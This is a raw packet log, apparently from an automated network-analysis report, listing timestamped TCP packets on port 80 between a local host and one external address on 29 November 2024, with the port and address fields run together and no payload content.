                                                                                Nov 29, 2024 01:52:25.906630993 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.940849066 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:25.958424091 CET804976472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026401997 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026680946 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026712894 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026738882 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026796103 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.026870012 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026901007 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.026918888 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.026945114 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.026988983 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027026892 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027029991 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027069092 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027098894 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027115107 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027143002 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027158022 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027206898 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027223110 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.027255058 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.027266026 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.060791969 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.062370062 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.062485933 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.146845102 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146869898 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146915913 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.146941900 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.146949053 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146964073 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.146992922 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.147002935 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.182346106 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.189332962 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.189518929 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.309485912 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.309556007 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.357383013 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.357444048 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.474939108 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.569438934 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.569494963 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.817429066 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.817639112 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.897185087 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:26.897264957 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:26.937751055 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017282009 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017298937 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017376900 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017394066 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017453909 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017489910 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.017540932 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.136359930 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.136450052 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.136594057 CET4976580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.245945930 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.246124983 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.246275902 CET4976680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.256561995 CET804976572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.363384008 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.366204977 CET804976672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.409286022 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.483931065 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.484010935 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.484153032 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529261112 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.529453039 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529521942 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529521942 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529587030 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.529613018 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.603997946 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649557114 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649655104 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649669886 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649677992 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649715900 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649736881 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649749041 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649786949 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649821043 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649847031 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649887085 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.649888039 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.649926901 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.650007010 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650019884 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650063992 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.650105953 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650115967 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.650165081 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.769727945 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769747019 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769823074 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.769825935 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769841909 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.769872904 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.769897938 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.813389063 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.816621065 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.933497906 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.933715105 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:27.977391005 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:27.977487087 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.097414970 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.189636946 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.192771912 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.437397003 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.439383030 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.500174046 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.500458956 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.559428930 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620620012 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620630026 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620750904 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620768070 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620915890 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620924950 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.620987892 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.667848110 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.667905092 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.667963982 CET4976780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.729839087 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.729895115 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.729929924 CET4976880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.784650087 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.788352013 CET804976772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.850590944 CET804976872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.904679060 CET804976972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:28.908169031 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.908432961 CET4976980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:28.996783972 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.028284073 CET804976972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.116714001 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.120562077 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120588064 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120625019 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120682955 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.120707035 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.240592957 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240704060 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240732908 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240765095 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240792036 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.240822077 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240870953 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240942001 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240974903 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.240982056 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.240998030 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241027117 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241028070 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241058111 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241084099 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241101027 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241133928 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241178989 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.241189957 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.241231918 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.360810041 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.360856056 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.360980988 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.360992908 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.361030102 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.361030102 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.361074924 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.405433893 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.405771971 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.525396109 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.525597095 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.569494963 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:29.569556952 CET4977080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:29.689408064 CET804977072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.193406105 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.193476915 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.313509941 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.405503988 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.405682087 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.653454065 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.653515100 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.699815989 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.699882030 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.714190006 CET804977772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.714251041 CET4977780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.714349985 CET4977780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.773555040 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.819912910 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.819957018 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820080042 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820137024 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820301056 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820363998 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.820467949 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.831619024 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.834314108 CET804977772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.929794073 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.930417061 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.930443048 CET4977880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.951648951 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:35.951778889 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:35.951947927 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.050394058 CET804977872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.071855068 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.212188005 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.332166910 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.334419966 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334525108 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334578991 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334667921 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.334692955 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454423904 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454498053 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454580069 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454597950 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454667091 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454679012 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454689980 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454745054 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454804897 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454814911 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454868078 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.454916954 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454927921 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454963923 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.454981089 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.455012083 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.455014944 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.455142021 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574645996 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574666977 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574765921 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574794054 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574794054 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574862003 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.574867010 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.574919939 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.617482901 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.617641926 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.737675905 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.737932920 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.781470060 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.781641960 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:36.901489019 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.989420891 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:36.992649078 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.135400057 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.136655092 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.136655092 CET4977980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.237457037 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.240744114 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.253721952 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.256580114 CET804977972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.289180040 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.291471958 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.360727072 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.373665094 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.376425028 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.376539946 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.411539078 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.411556005 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493460894 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493472099 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493474960 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493479013 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493482113 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.493484974 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.496488094 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.518877983 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.519038916 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.519098043 CET4978080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.639034986 CET804978072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.762912989 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883124113 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:37.883187056 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883363008 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883363008 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883435965 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:37.883460045 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.003267050 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003427029 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003472090 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003555059 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.003599882 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003609896 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003614902 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003753901 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003794909 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003926039 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003947973 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.003974915 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.004067898 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.004096031 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.017527103 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.123802900 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.123812914 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.123960018 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.123980045 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.124020100 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.124059916 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.124106884 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.165498018 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.165654898 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.285516024 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.285621881 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.329467058 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.329653978 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.449503899 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.537477016 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.537707090 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.559956074 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.560137033 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.560189009 CET4978180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.675638914 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.680247068 CET804978172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.785573006 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.785646915 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.795713902 CET804978372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.795896053 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.796008110 CET4978380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.837615013 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.837704897 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:38.905589104 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.915962934 CET804978372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.957870007 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.957936049 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958045006 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958060980 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958115101 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958161116 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:38.958201885 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.067451000 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.067514896 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.067548037 CET4978280192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:39.187633991 CET804978272.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:39.270267010 CET4978480192.168.2.472.52.178.23
